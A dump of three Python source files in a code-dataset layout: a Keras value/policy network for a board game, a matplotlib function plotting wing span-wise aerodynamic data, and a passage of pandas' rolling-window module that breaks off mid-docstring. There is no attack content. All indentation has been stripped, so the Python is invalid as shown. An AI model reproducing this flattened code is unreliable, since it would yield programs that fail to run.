from tensorflow.keras import regularizers, optimizers, layers, Model
from tensorflow.keras.models import load_model
if TYPE_CHECKING:
from game import BoardTensor
class AbstractModel(ABC):
model: Model
name: str
def __init__(self, **kwargs):
self.name = ""
@abstractmethod
def predict(self, tensor: "BoardTensor", mask: np.array) -> Tuple[float, np.ndarray]:
pass
@abstractmethod
def set_name(self, name: str) -> None:
pass
@abstractmethod
def load(self, filename: str) -> None:
pass
@abstractmethod
def load_checkpoint(self, filepath: str) -> None:
pass
@abstractmethod
def save(self, filename: str) -> None:
pass
class ValuePolicyModel(AbstractModel):
def __init__(self, **kwargs):
super().__init__()
self.conv_kernel_reg = regularizers.l2(
kwargs.get("CONVOLUTIONAL_KERNEL_REGULARIZATION", 0.01))
self.conv_bias_reg = regularizers.l2(
kwargs.get("CONVOLUTIONAL_BIAS_REGULARIZATION", 0.01))
self.dense_kernel_reg = regularizers.l2(
kwargs.get("DENSE_KERNEL_REGULARIZATION", 0.01))
self.dense_bias_reg = regularizers.l2(
kwargs.get("DENSE_BIAS_REGULARIZATION", 0.01))
self.num_filters = kwargs.get("NUMBER_OF_FILTERS", 12)
self.policy_loss_weight = kwargs.get("POLICY_LOSS_WEIGHT", 0.01)
self.value_loss_weight = kwargs.get("VALUE_LOSS_WEIGHT", 0.01)
self.input_shape = (9, 7, 24)
self.output_shape = (9, 7, 8)
self.conv_blocks = kwargs.get("CONVOLUTIONAL_BLOCKS", 6)
self.model = self._create_model()
self.base_dir = kwargs.get("BASE_DIR", "data/models") # TODO unify save paths
self._cache = {}
def _create_model(self) -> Model:
model_input = layers.Input(shape=self.input_shape)
input_layer = model_input
for layer_id in range(self.conv_blocks):
input_layer = self._get_conv_block(input_layer, layer_id)
final_conv_layer = input_layer
policy_head = self._get_policy_head(final_conv_layer)
value_head = self._get_value_head(final_conv_layer)
model = Model(model_input, [value_head, policy_head])
model.compile(
loss={
"Policy_Head": "categorical_crossentropy",
"Value_Head": "mse"
},
loss_weights={
"Policy_Head": self.policy_loss_weight,
"Value_Head": self.value_loss_weight
},
optimizer=optimizers.Adam()
)
return model
def set_name(self, name: str) -> None:
self.name = name
def load(self, filename: int = -1) -> None:
self._cache.clear()
load_dir = os.path.join(self.base_dir, self.name)
if filename == -1:
filename = max(os.listdir(load_dir))
filepath = os.path.join(load_dir, str(filename))
self.model = load_model(filepath)
logging.info(f"Loaded karas model from '{filepath}'")
def load_checkpoint(self, filepath: str) -> None:
self._cache.clear()
self.model = load_model(filepath)
logging.info(f"Loaded karas checkpoint data from '{filepath}'")
def save(self, filename: str) -> None:
filepath = os.path.join(self.base_dir, self.name, filename)
self.model.save(filepath)
logging.info(f"Saved karas model to '{filepath}'")
def _get_conv_block(self, input_layer: layers.Layer, layer_id: int) -> layers.Layer:
conv_layer = layers.Conv2D(filters=self.num_filters, kernel_size=(3, 3), padding="same",
activation="relu", use_bias=True, data_format="channels_last",
kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg,
name=f"Convolutional_Layer_{layer_id}")(input_layer)
batch_norm = layers.BatchNormalization(
axis=-1, name=f"Batch_Normalization_{layer_id}")(conv_layer)
return batch_norm
def _get_policy_head(self, input_layer: layers.Layer) -> layers.Layer:
conv_layer_1 = layers.Conv2D(
filters=self.num_filters, kernel_size=(3, 3), padding="same", activation="relu",
use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg, name="Policy_Convolutional_Layer_1")(input_layer)
batch_norm_1 = layers.BatchNormalization(
axis=-1, name="Policy_Batch_Normalization_1")(conv_layer_1)
conv_layer_2 = layers.Conv2D(
filters=1, kernel_size=(1, 1), padding="same", activation="relu",
use_bias=True, data_format="channels_last", kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg, name="Policy_Convolutional_Layer_2")(batch_norm_1)
batch_norm_2 = layers.BatchNormalization(
axis=-1, name="Policy_Batch_Normalization_2")(conv_layer_2)
flatten_layer = layers.Flatten(name="Policy_Flatten_Layer")(batch_norm_2)
output_layer = layers.Dense(
np.product(self.output_shape), activation='softmax', use_bias=True,
kernel_regularizer=self.dense_kernel_reg, bias_regularizer=self.dense_kernel_reg,
name='Policy_Head')(flatten_layer)
return output_layer
def _get_value_head(self, input_layer: layers.Layer) -> layers.Layer:
conv_layer = layers.Conv2D(
filters=1, kernel_size=(1, 1), padding="same", activation="relu", use_bias=True,
data_format="channels_last", kernel_regularizer=self.conv_kernel_reg,
bias_regularizer=self.conv_bias_reg, name="Value_Convolutional_Layer")(input_layer)
batch_norm_1 = layers.BatchNormalization(
axis=-1, name="Value_Batch_Normalization_1")(conv_layer)
flatten_layer = layers.Flatten(name="Value_Flatten_Layer")(batch_norm_1)
dense_layer = layers.Dense(
64, activation="relu", use_bias=True, kernel_regularizer=self.dense_kernel_reg,
bias_regularizer=self.dense_bias_reg, name="Value_Dense_Layer")(flatten_layer)
batch_norm_2 = layers.BatchNormalization(
axis=-1, name="Value_Batch_Normalization_2")(dense_layer)
output_layer = layers.Dense(
1, activation="tanh", use_bias=True, kernel_regularizer=self.dense_kernel_reg,
bias_regularizer=self.dense_bias_reg, name="Value_Head")(batch_norm_2)
return output_layer
def predict(self, tensor: "BoardTensor", mask: np.array) -> Tuple[float, np.ndarray]:
"""
Given tensor and mask executes following algorithm.
1. Predict value (float) and policy (array 9x7x8) using NN provided with tensor.
2. Applies mask to remove invalid policies.
3. Normalizes masked array.
:param tensor: Array representing current and previous board states.
:param mask: Boolean array, 1's indicate valid moves and 0's invalid.
:return: Tuple of predicted [value, normalised_probabilities].
"""
if tensor.shape == self.input_shape:
tensor = np.expand_dims(tensor, axis=0)
value, policy = self._get_prediction(tensor)
value = value[0][0]
policy = policy.reshape(self.output_shape)
policy *= mask
policy = policy / np.sum(policy)
return value, policy
def _get_prediction(self, tensor) -> Tuple[float, np.ndarray]:
"""
Cached version of Keras.model.predict.
:param tensor: Array representing current and previous board states.
:return: Tuple of predicted [value, probabilities].
"""
tensor_key = tensor.data.tobytes()
if tensor_key not in self._cache:
self._cache[tensor_key] = self.model.predict(tensor)
if len(self._cache) > 2000:
key = next(iter(self._cache))
del self._cache[key]
return self._cache[tensor_key]
value_policy_model = ValuePolicyModel()
if __name__ == '__main__':
# RUN TO GENERATE NEW MODEL TO TRAIN ON
name = "first_model"
kwargs = {"BASE_DIR": "../data/models"}
model = ValuePolicyModel(**kwargs)
model.set_name(name)
model.save("0")
| 39.794393 | 99 | 0.65054 |
4f0e039c6ccc21f620b90d34e94415dfb0bf1f6e | 808 | py | Python | fpa/post_process_operation.py | salamann/fpadesigner | ebb92eef5998b8dd0562f5374ae39a80647926e5 | [
"MIT"
] | null | null | null | fpa/post_process_operation.py | salamann/fpadesigner | ebb92eef5998b8dd0562f5374ae39a80647926e5 | [
"MIT"
] | null | null | null | fpa/post_process_operation.py | salamann/fpadesigner | ebb92eef5998b8dd0562f5374ae39a80647926e5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import os
def draw_spandirdata(yy, dL, clDist, circDist, ellipse, inducedAoa, planx, plany, dirname):
plt.figure(figsize=(12, 10))
plt.axis("equal")
plt.subplot(511)
plt.plot(yy, dL, label="dL")
plt.legend()
plt.subplot(512)
plt.plot(yy, clDist, label="dCL")
plt.legend()
plt.subplot(513)
plt.plot(yy, circDist, label="Gamma")
plt.plot(yy, ellipse, label="Ideal")
plt.legend()
plt.subplot(514)
plt.plot(yy, inducedAoa, label="Alpha_i")
plt.legend()
plt.subplot(515)
plt.plot(planx, plany, label="Planform")
plt.legend()
plt.xlabel("y [m]")
plt.legend()
plt.savefig(os.path.join("results", dirname, "span"))
if __name__ == '__main__':
pass
| 25.25 | 91 | 0.628713 |
3e0e0b74a971bfa6ee5efbbf5253247fb48bb8ce | 70,929 | py | Python | pandas/core/window.py | ikoevska/pandas | 7169830040255c1073f99e2ee8817596a67b1cd5 | [
"BSD-3-Clause"
] | 1 | 2019-04-27T15:15:15.000Z | 2019-04-27T15:15:15.000Z | pandas/core/window.py | ikoevska/pandas | 7169830040255c1073f99e2ee8817596a67b1cd5 | [
"BSD-3-Clause"
] | null | null | null | pandas/core/window.py | ikoevska/pandas | 7169830040255c1073f99e2ee8817596a67b1cd5 | [
"BSD-3-Clause"
] | null | null | null | """
provide a generic structure to support window functions,
similar to how we have a Groupby object
"""
from __future__ import division
import warnings
import numpy as np
from collections import defaultdict
from datetime import timedelta
from pandas.core.dtypes.generic import (
ABCSeries,
ABCDataFrame,
ABCDatetimeIndex,
ABCTimedeltaIndex,
ABCPeriodIndex,
ABCDateOffset)
from pandas.core.dtypes.common import (
is_integer,
is_bool,
is_float_dtype,
is_integer_dtype,
needs_i8_conversion,
is_timedelta64_dtype,
is_list_like,
_ensure_float64,
is_scalar)
from pandas.core.base import (PandasObject, SelectionMixin,
GroupByMixin)
import pandas.core.common as com
import pandas._libs.window as _window
from pandas import compat
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (Substitution, Appender,
cache_readonly)
from pandas.core.generic import _shared_docs
from textwrap import dedent
_shared_docs = dict(**_shared_docs)
_doc_template = """
Returns
-------
same type as input
See also
--------
pandas.Series.%(name)s
pandas.DataFrame.%(name)s
"""
class _Window(PandasObject, SelectionMixin):
_attributes = ['window', 'min_periods', 'center', 'win_type',
'axis', 'on', 'closed']
exclusions = set()
def __init__(self, obj, window=None, min_periods=None,
center=False, win_type=None, axis=0, on=None, closed=None,
**kwargs):
self.__dict__.update(kwargs)
self.blocks = []
self.obj = obj
self.on = on
self.closed = closed
self.window = window
self.min_periods = min_periods
self.center = center
self.win_type = win_type
self.win_freq = None
self.axis = obj._get_axis_number(axis) if axis is not None else None
self.validate()
@property
def _constructor(self):
return Window
@property
def is_datetimelike(self):
return None
@property
def _on(self):
return None
@property
def is_freq_type(self):
return self.win_type == 'freq'
def validate(self):
if self.center is not None and not is_bool(self.center):
raise ValueError("center must be a boolean")
if self.min_periods is not None and not \
is_integer(self.min_periods):
raise ValueError("min_periods must be an integer")
if self.closed is not None and self.closed not in \
['right', 'both', 'left', 'neither']:
raise ValueError("closed must be 'right', 'left', 'both' or "
"'neither'")
def _convert_freq(self):
""" resample according to the how, return a new object """
obj = self._selected_obj
index = None
return obj, index
def _create_blocks(self):
""" split data into blocks & return conformed data """
obj, index = self._convert_freq()
if index is not None:
index = self._on
# filter out the on from the object
if self.on is not None:
if obj.ndim == 2:
obj = obj.reindex(columns=obj.columns.difference([self.on]),
copy=False)
blocks = obj._to_dict_of_blocks(copy=False).values()
return blocks, obj, index
def _gotitem(self, key, ndim, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
# create a new object to prevent aliasing
if subset is None:
subset = self.obj
self = self._shallow_copy(subset)
self._reset_cache()
if subset.ndim == 2:
if is_scalar(key) and key in subset or is_list_like(key):
self._selection = key
return self
def __getattr__(self, attr):
if attr in self._internal_names_set:
return object.__getattribute__(self, attr)
if attr in self.obj:
return self[attr]
raise AttributeError("%r object has no attribute %r" %
(type(self).__name__, attr))
def _dir_additions(self):
return self.obj._dir_additions()
def _get_window(self, other=None):
return self.window
@property
def _window_type(self):
return self.__class__.__name__
def __unicode__(self):
""" provide a nice str repr of our rolling object """
attrs = ["{k}={v}".format(k=k, v=getattr(self, k))
for k in self._attributes
if getattr(self, k, None) is not None]
return "{klass} [{attrs}]".format(klass=self._window_type,
attrs=','.join(attrs))
def _get_index(self, index=None):
"""
Return index as ndarrays
Returns
-------
tuple of (index, index_as_ndarray)
"""
if self.is_freq_type:
if index is None:
index = self._on
return index, index.asi8
return index, index
def _prep_values(self, values=None, kill_inf=True):
if values is None:
values = getattr(self._selected_obj, 'values', self._selected_obj)
# GH #12373 : rolling functions error on float32 data
# make sure the data is coerced to float64
if is_float_dtype(values.dtype):
values = _ensure_float64(values)
elif is_integer_dtype(values.dtype):
values = _ensure_float64(values)
elif needs_i8_conversion(values.dtype):
raise NotImplementedError("ops for {action} for this "
"dtype {dtype} are not "
"implemented".format(
action=self._window_type,
dtype=values.dtype))
else:
try:
values = _ensure_float64(values)
except (ValueError, TypeError):
raise TypeError("cannot handle this type -> {0}"
"".format(values.dtype))
if kill_inf:
values = values.copy()
values[np.isinf(values)] = np.NaN
return values
def _wrap_result(self, result, block=None, obj=None):
""" wrap a single result """
if obj is None:
obj = self._selected_obj
index = obj.index
if isinstance(result, np.ndarray):
# coerce if necessary
if block is not None:
if is_timedelta64_dtype(block.values.dtype):
from pandas import to_timedelta
result = to_timedelta(
result.ravel(), unit='ns').values.reshape(result.shape)
if result.ndim == 1:
from pandas import Series
return Series(result, index, name=obj.name)
return type(obj)(result, index=index, columns=block.columns)
return result
def _wrap_results(self, results, blocks, obj):
"""
wrap the results
Parameters
----------
results : list of ndarrays
blocks : list of blocks
obj : conformed data (may be resampled)
"""
from pandas import Series, concat
from pandas.core.index import _ensure_index
final = []
for result, block in zip(results, blocks):
result = self._wrap_result(result, block=block, obj=obj)
if result.ndim == 1:
return result
final.append(result)
# if we have an 'on' column
# we want to put it back into the results
# in the same location
columns = self._selected_obj.columns
if self.on is not None and not self._on.equals(obj.index):
name = self._on.name
final.append(Series(self._on, index=obj.index, name=name))
if self._selection is not None:
selection = _ensure_index(self._selection)
# need to reorder to include original location of
# the on column (if its not already there)
if name not in selection:
columns = self.obj.columns
indexer = columns.get_indexer(selection.tolist() + [name])
columns = columns.take(sorted(indexer))
if not len(final):
return obj.astype('float64')
return concat(final, axis=1).reindex(columns=columns, copy=False)
def _center_window(self, result, window):
""" center the result in the window """
if self.axis > result.ndim - 1:
raise ValueError("Requested axis is larger then no. of argument "
"dimensions")
offset = _offset(window, True)
if offset > 0:
if isinstance(result, (ABCSeries, ABCDataFrame)):
result = result.slice_shift(-offset, axis=self.axis)
else:
lead_indexer = [slice(None)] * result.ndim
lead_indexer[self.axis] = slice(offset, None)
result = np.copy(result[tuple(lead_indexer)])
return result
def aggregate(self, arg, *args, **kwargs):
result, how = self._aggregate(arg, *args, **kwargs)
if result is None:
return self.apply(arg, args=args, kwargs=kwargs)
return result
agg = aggregate
_shared_docs['sum'] = dedent("""
%(name)s sum""")
_shared_docs['mean'] = dedent("""
%(name)s mean""")
class Window(_Window):
"""
Provides rolling window calculations.
.. versionadded:: 0.18.0
Parameters
----------
window : int, or offset
Size of the moving window. This is the number of observations used for
calculating the statistic. Each window will be a fixed size.
If its an offset then this will be the time period of each window. Each
window will be a variable sized based on the observations included in
the time-period. This is only valid for datetimelike indexes. This is
new in 0.19.0
min_periods : int, default None
Minimum number of observations in window required to have a value
(otherwise result is NA). For a window that is specified by an offset,
this will default to 1.
center : boolean, default False
Set the labels at the center of the window.
win_type : string, default None
Provide a window type. If ``None``, all points are evenly weighted.
See the notes below for further information.
on : string, optional
For a DataFrame, column on which to calculate
the rolling window, rather than the index
closed : string, default None
Make the interval closed on the 'right', 'left', 'both' or
'neither' endpoints.
For offset-based windows, it defaults to 'right'.
For fixed windows, defaults to 'both'. Remaining cases not implemented
for fixed windows.
.. versionadded:: 0.20.0
axis : int or string, default 0
Returns
-------
a Window or Rolling sub-classed for the particular operation
Examples
--------
>>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
>>> df
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
Rolling sum with a window length of 2, using the 'triang'
window type.
>>> df.rolling(2, win_type='triang').sum()
B
0 NaN
1 1.0
2 2.5
3 NaN
4 NaN
Rolling sum with a window length of 2, min_periods defaults
to the window length.
>>> df.rolling(2).sum()
B
0 NaN
1 1.0
2 3.0
3 NaN
4 NaN
Same as above, but explicitly set the min_periods
>>> df.rolling(2, min_periods=1).sum()
B
0 0.0
1 1.0
2 3.0
3 2.0
4 4.0
A ragged (meaning not-a-regular frequency), time-indexed DataFrame
>>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]},
... index = [pd.Timestamp('20130101 09:00:00'),
... pd.Timestamp('20130101 09:00:02'),
... pd.Timestamp('20130101 09:00:03'),
... pd.Timestamp('20130101 09:00:05'),
... pd.Timestamp('20130101 09:00:06')])
>>> df
B
2013-01-01 09:00:00 0.0
2013-01-01 09:00:02 1.0
2013-01-01 09:00:03 2.0
2013-01-01 09:00:05 NaN
2013-01-01 09:00:06 4.0
Contrasting to an integer rolling window, this will roll a variable
length window corresponding to the time period.
The default for min_periods is 1.
>>> df.rolling('2s').sum()
B
2013-01-01 09:00:00 0.0
2013-01-01 09:00:02 1.0
2013-01-01 09:00:03 3.0
2013-01-01 09:00:05 NaN
2013-01-01 09:00:06 4.0
Notes
-----
By default, the result is set to the right edge of the window. This can be
changed to the center of the window by setting ``center=True``.
To learn more about the offsets & frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
The recognized win_types are:
* ``boxcar``
* ``triang``
* ``blackman``
* ``hamming``
* ``bartlett``
* ``parzen``
* ``bohman``
* ``blackmanharris``
* ``nuttall``
* ``barthann``
* ``kaiser`` (needs beta)
* ``gaussian`` (needs std)
* ``general_gaussian`` (needs power, width)
* ``slepian`` (needs width).
If ``win_type=None`` all points are evenly weighted. To learn more about
different window types see `scipy.signal window functions
<https://docs.scipy.org/doc/scipy/reference/signal.html#window-functions>`__.
See Also
--------
expanding : Provides expanding transformations.
ewm : Provides exponential weighted functions
"""
def validate(self):
super(Window, self).validate()
window = self.window
if isinstance(window, (list, tuple, np.ndarray)):
pass
elif is_integer(window):
if window < 0:
raise ValueError("window must be non-negative")
try:
import scipy.signal as sig
except ImportError:
raise ImportError('Please install scipy to generate window '
'weight')
if not isinstance(self.win_type, compat.string_types):
raise ValueError('Invalid win_type {0}'.format(self.win_type))
if getattr(sig, self.win_type, None) is None:
raise ValueError('Invalid win_type {0}'.format(self.win_type))
else:
raise ValueError('Invalid window {0}'.format(window))
def _prep_window(self, **kwargs):
"""
provide validation for our window type, return the window
we have already been validated
"""
window = self._get_window()
if isinstance(window, (list, tuple, np.ndarray)):
return com._asarray_tuplesafe(window).astype(float)
elif is_integer(window):
import scipy.signal as sig
# the below may pop from kwargs
def _validate_win_type(win_type, kwargs):
arg_map = {'kaiser': ['beta'],
'gaussian': ['std'],
'general_gaussian': ['power', 'width'],
'slepian': ['width']}
if win_type in arg_map:
return tuple([win_type] + _pop_args(win_type,
arg_map[win_type],
kwargs))
return win_type
def _pop_args(win_type, arg_names, kwargs):
msg = '%s window requires %%s' % win_type
all_args = []
for n in arg_names:
if n not in kwargs:
raise ValueError(msg % n)
all_args.append(kwargs.pop(n))
return all_args
win_type = _validate_win_type(self.win_type, kwargs)
# GH #15662. `False` makes symmetric window, rather than periodic.
return sig.get_window(win_type, window, False).astype(float)
def _apply_window(self, mean=True, **kwargs):
"""
Applies a moving window of type ``window_type`` on the data.
Parameters
----------
mean : boolean, default True
If True computes weighted mean, else weighted sum
Returns
-------
y : type of input argument
"""
window = self._prep_window(**kwargs)
center = self.center
blocks, obj, index = self._create_blocks()
results = []
for b in blocks:
try:
values = self._prep_values(b.values)
except TypeError:
results.append(b.values.copy())
continue
if values.size == 0:
results.append(values.copy())
continue
offset = _offset(window, center)
additional_nans = np.array([np.NaN] * offset)
def f(arg, *args, **kwargs):
minp = _use_window(self.min_periods, len(window))
return _window.roll_window(np.concatenate((arg,
additional_nans))
if center else arg, window, minp,
avg=mean)
result = np.apply_along_axis(f, self.axis, values)
if center:
result = self._center_window(result, window)
results.append(result)
return self._wrap_results(results, blocks, obj)
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.rolling(3, win_type='boxcar').agg('mean')
A B C
0 NaN NaN NaN
1 NaN NaN NaN
2 -0.885035 0.212600 -0.711689
3 -0.323928 -0.200122 -1.093408
4 -0.071445 -0.431533 -1.075833
5 0.504739 0.676083 -0.996353
6 0.358206 1.903256 -0.774200
7 0.906020 1.283573 0.085482
8 -0.096361 0.818139 0.472290
9 0.070889 0.134399 -0.031308
See also
--------
pandas.DataFrame.rolling.aggregate
pandas.DataFrame.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
result, how = self._aggregate(arg, *args, **kwargs)
if result is None:
# these must apply directly
result = arg(self)
return result
agg = aggregate
@Substitution(name='window')
@Appender(_doc_template)
@Appender(_shared_docs['sum'])
def sum(self, *args, **kwargs):
nv.validate_window_func('sum', args, kwargs)
return self._apply_window(mean=False, **kwargs)
@Substitution(name='window')
@Appender(_doc_template)
@Appender(_shared_docs['mean'])
def mean(self, *args, **kwargs):
nv.validate_window_func('mean', args, kwargs)
return self._apply_window(mean=True, **kwargs)
class _GroupByMixin(GroupByMixin):
""" provide the groupby facilities """
def __init__(self, obj, *args, **kwargs):
parent = kwargs.pop('parent', None) # noqa
groupby = kwargs.pop('groupby', None)
if groupby is None:
groupby, obj = obj, obj.obj
self._groupby = groupby
self._groupby.mutated = True
self._groupby.grouper.mutated = True
super(GroupByMixin, self).__init__(obj, *args, **kwargs)
count = GroupByMixin._dispatch('count')
corr = GroupByMixin._dispatch('corr', other=None, pairwise=None)
cov = GroupByMixin._dispatch('cov', other=None, pairwise=None)
def _apply(self, func, name, window=None, center=None,
check_minp=None, **kwargs):
"""
dispatch to apply; we are stripping all of the _apply kwargs and
performing the original function call on the grouped object
"""
def f(x, name=name, *args):
x = self._shallow_copy(x)
if isinstance(name, compat.string_types):
return getattr(x, name)(*args, **kwargs)
return x.apply(name, *args, **kwargs)
return self._groupby.apply(f)
class _Rolling(_Window):
@property
def _constructor(self):
return Rolling
def _apply(self, func, name=None, window=None, center=None,
check_minp=None, **kwargs):
"""
Rolling statistical measure using supplied function. Designed to be
used with passed-in Cython array-based functions.
Parameters
----------
func : string/callable to apply
name : string, optional
name of this function
window : int/array, default to _get_window()
center : boolean, default to self.center
check_minp : function, default to _use_window
Returns
-------
y : type of input
"""
if center is None:
center = self.center
if window is None:
window = self._get_window()
if check_minp is None:
check_minp = _use_window
blocks, obj, index = self._create_blocks()
index, indexi = self._get_index(index=index)
results = []
for b in blocks:
try:
values = self._prep_values(b.values)
except TypeError:
results.append(b.values.copy())
continue
if values.size == 0:
results.append(values.copy())
continue
# if we have a string function name, wrap it
if isinstance(func, compat.string_types):
cfunc = getattr(_window, func, None)
if cfunc is None:
raise ValueError("we do not support this function "
"in _window.{0}".format(func))
def func(arg, window, min_periods=None, closed=None):
minp = check_minp(min_periods, window)
# ensure we are only rolling on floats
arg = _ensure_float64(arg)
return cfunc(arg,
window, minp, indexi, closed, **kwargs)
# calculation function
if center:
offset = _offset(window, center)
additional_nans = np.array([np.NaN] * offset)
def calc(x):
return func(np.concatenate((x, additional_nans)),
window, min_periods=self.min_periods,
closed=self.closed)
else:
def calc(x):
return func(x, window, min_periods=self.min_periods,
closed=self.closed)
with np.errstate(all='ignore'):
if values.ndim > 1:
result = np.apply_along_axis(calc, self.axis, values)
else:
result = calc(values)
if center:
result = self._center_window(result, window)
results.append(result)
return self._wrap_results(results, blocks, obj)
class _Rolling_and_Expanding(_Rolling):
_shared_docs['count'] = """%(name)s count of number of non-NaN
observations inside provided window."""
def count(self):
blocks, obj, index = self._create_blocks()
index, indexi = self._get_index(index=index)
window = self._get_window()
window = min(window, len(obj)) if not self.center else window
results = []
for b in blocks:
result = b.notna().astype(int)
result = self._constructor(result, window=window, min_periods=0,
center=self.center,
closed=self.closed).sum()
results.append(result)
return self._wrap_results(results, blocks, obj)
_shared_docs['apply'] = dedent(r"""
%(name)s function apply
Parameters
----------
func : function
Must produce a single value from an ndarray input
\*args and \*\*kwargs are passed to the function""")
def apply(self, func, args=(), kwargs={}):
# TODO: _level is unused?
_level = kwargs.pop('_level', None) # noqa
window = self._get_window()
offset = _offset(window, self.center)
index, indexi = self._get_index()
def f(arg, window, min_periods, closed):
minp = _use_window(min_periods, window)
return _window.roll_generic(arg, window, minp, indexi, closed,
offset, func, args, kwargs)
return self._apply(f, func, args=args, kwargs=kwargs,
center=False)
def sum(self, *args, **kwargs):
nv.validate_window_func('sum', args, kwargs)
return self._apply('roll_sum', 'sum', **kwargs)
_shared_docs['max'] = dedent("""
%(name)s maximum
""")
def max(self, *args, **kwargs):
nv.validate_window_func('max', args, kwargs)
return self._apply('roll_max', 'max', **kwargs)
_shared_docs['min'] = dedent("""
%(name)s minimum
""")
def min(self, *args, **kwargs):
nv.validate_window_func('min', args, kwargs)
return self._apply('roll_min', 'min', **kwargs)
def mean(self, *args, **kwargs):
nv.validate_window_func('mean', args, kwargs)
return self._apply('roll_mean', 'mean', **kwargs)
_shared_docs['median'] = dedent("""
%(name)s median
""")
def median(self, **kwargs):
return self._apply('roll_median_c', 'median', **kwargs)
_shared_docs['std'] = dedent("""
Calculate %(name)s standard deviation.
Normalized by N-1 by default. This can be changed using the `ddof`
argument.
Parameters
----------
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
*args, **kwargs
For NumPy compatibility. No additional arguments are used.
Returns
-------
Series or DataFrame
Returns the same object type as the caller of the %(name)s calculation.
See Also
--------
Series.%(name)s : Calling object with Series data
DataFrame.%(name)s : Calling object with DataFrames
Series.std : Equivalent method for Series
DataFrame.std : Equivalent method for DataFrame
numpy.std : Equivalent method for Numpy array
Notes
-----
The default `ddof` of 1 used in Series.std is different than the default
`ddof` of 0 in numpy.std.
A minimum of one period is required for the rolling calculation.
Examples
--------
>>> s = pd.Series([5, 5, 6, 7, 5, 5, 5])
>>> s.rolling(3).std()
0 NaN
1 NaN
2 0.577350
3 1.000000
4 1.000000
5 1.154701
6 0.000000
dtype: float64
>>> s.expanding(3).std()
0 NaN
1 NaN
2 0.577350
3 0.957427
4 0.894427
5 0.836660
6 0.786796
dtype: float64
""")
def std(self, ddof=1, *args, **kwargs):
nv.validate_window_func('std', args, kwargs)
window = self._get_window()
index, indexi = self._get_index()
def f(arg, *args, **kwargs):
minp = _require_min_periods(1)(self.min_periods, window)
return _zsqrt(_window.roll_var(arg, window, minp, indexi,
self.closed, ddof))
return self._apply(f, 'std', check_minp=_require_min_periods(1),
ddof=ddof, **kwargs)
_shared_docs['var'] = dedent("""
Calculate unbiased %(name)s variance.
Normalized by N-1 by default. This can be changed using the `ddof`
argument.
Parameters
----------
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
*args, **kwargs
For NumPy compatibility. No additional arguments are used.
Returns
-------
Series or DataFrame
Returns the same object type as the caller of the %(name)s calculation.
See Also
--------
Series.%(name)s : Calling object with Series data
DataFrame.%(name)s : Calling object with DataFrames
Series.var : Equivalent method for Series
DataFrame.var : Equivalent method for DataFrame
numpy.var : Equivalent method for Numpy array
Notes
-----
The default `ddof` of 1 used in :meth:`Series.var` is different than the
default `ddof` of 0 in :func:`numpy.var`.
A minimum of 1 period is required for the rolling calculation.
Examples
--------
>>> s = pd.Series([5, 5, 6, 7, 5, 5, 5])
>>> s.rolling(3).var()
0 NaN
1 NaN
2 0.333333
3 1.000000
4 1.000000
5 1.333333
6 0.000000
dtype: float64
>>> s.expanding(3).var()
0 NaN
1 NaN
2 0.333333
3 0.916667
4 0.800000
5 0.700000
6 0.619048
dtype: float64
""")
def var(self, ddof=1, *args, **kwargs):
nv.validate_window_func('var', args, kwargs)
return self._apply('roll_var', 'var',
check_minp=_require_min_periods(1), ddof=ddof,
**kwargs)
_shared_docs['skew'] = """Unbiased %(name)s skewness"""
def skew(self, **kwargs):
return self._apply('roll_skew', 'skew',
check_minp=_require_min_periods(3), **kwargs)
_shared_docs['kurt'] = dedent("""
Calculate unbiased %(name)s kurtosis.
This function uses Fisher's definition of kurtosis without bias.
Parameters
----------
**kwargs
Under Review.
Returns
-------
Series or DataFrame
Returned object type is determined by the caller of the %(name)s
calculation
See Also
--------
Series.%(name)s : Calling object with Series data
DataFrame.%(name)s : Calling object with DataFrames
Series.kurt : Equivalent method for Series
DataFrame.kurt : Equivalent method for DataFrame
scipy.stats.skew : Third moment of a probability density
scipy.stats.kurtosis : Reference SciPy method
Notes
-----
A minimum of 4 periods is required for the %(name)s calculation.
""")
def kurt(self, **kwargs):
return self._apply('roll_kurt', 'kurt',
check_minp=_require_min_periods(4), **kwargs)
_shared_docs['quantile'] = dedent("""
%(name)s quantile
Parameters
----------
quantile : float
0 <= quantile <= 1""")
def quantile(self, quantile, **kwargs):
window = self._get_window()
index, indexi = self._get_index()
def f(arg, *args, **kwargs):
minp = _use_window(self.min_periods, window)
if quantile == 1.0:
return _window.roll_max(arg, window, minp, indexi,
self.closed)
elif quantile == 0.0:
return _window.roll_min(arg, window, minp, indexi,
self.closed)
else:
return _window.roll_quantile(arg, window, minp, indexi,
self.closed, quantile)
return self._apply(f, 'quantile', quantile=quantile,
**kwargs)
_shared_docs['cov'] = dedent("""
%(name)s sample covariance
Parameters
----------
other : Series, DataFrame, or ndarray, optional
if not supplied then will default to self and produce pairwise output
pairwise : bool, default None
If False then only matching columns between self and other will be used
and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndexed DataFrame in the case of DataFrame
